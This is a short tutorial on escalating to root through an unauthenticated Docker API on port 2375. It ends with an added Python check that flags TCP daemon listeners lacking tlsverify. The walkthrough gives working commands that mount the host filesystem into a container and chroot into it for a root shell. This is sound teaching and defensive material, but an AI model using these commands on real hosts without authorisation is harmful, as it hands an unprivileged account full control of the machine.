Docker - Escalation of privilege - Misconfigured Docker Socket



Check the current user:

whoami
john

 

List all processes listening on TCP ports

netstat -tlp
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 localhost:2375          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      -                   
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN      -           

 

  • Port 2375: Docker API unencrypted
  • Port 2376: Docker API encrypted

 

Check whether the service listening on port 2375 is the Docker API:

curl localhost:2375/version
{"Platform":{"Name":"Docker Engine - Community"},
...

The Docker client is installed on the machine, and the daemon is listening on the default unencrypted port 2375. Now let's configure the Docker client to reach it over TCP.

 

export DOCKER_HOST="tcp://localhost:2375"

 

https://docs.docker.com/engine/reference/commandline/cli/#environment-variables

 

Start a container with the root of the host machine mounted on a directory inside the container. The alpine image ships sh, not bash, so the container's shell is sh:

docker run -it -v /:/mnt alpine sh

Once inside the container:

 

chroot /mnt bash

 

Check the current user again:

whoami
root

 

In one line:

docker run -it --rm -v /:/mnt alpine chroot /mnt bash
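
The root cause above is a daemon that exposes its API on TCP without client authentication. The following check is an added example, not part of the original page: it audits a daemon.json and a dockerd command line for tcp:// listeners that lack tlsverify. The sample configurations and certificate paths are constructed, and the function name is hypothetical.

```python
import json
import shlex

# Constructed sample inputs (not taken from the page).
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://127.0.0.1:2375"]}'
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",      # placeholder paths
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

def audit_docker_listeners(daemon_json, dockerd_cmdline=""):
    """Return one finding per tcp:// listener that does not require client certificates."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    hosts = list(cfg.get("hosts", []))
    tlsverify = bool(cfg.get("tlsverify", False))
    args = shlex.split(dockerd_cmdline)
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 1
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        i += 1
    findings = []
    for host in hosts:
        # unix:// and fd:// listeners are guarded by socket file permissions instead.
        if host.startswith("tcp://") and not tlsverify:
            # A loopback bind does not help: every local account can still connect,
            # and API access is equivalent to root on the host.
            findings.append(f"{host}: TCP API without tlsverify (no client authentication)")
    return findings

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(name, audit_docker_listeners(cfg) or "ok")
```

Only tlsverify is treated as sufficient here, because tls on its own encrypts the connection but does not require a client certificate.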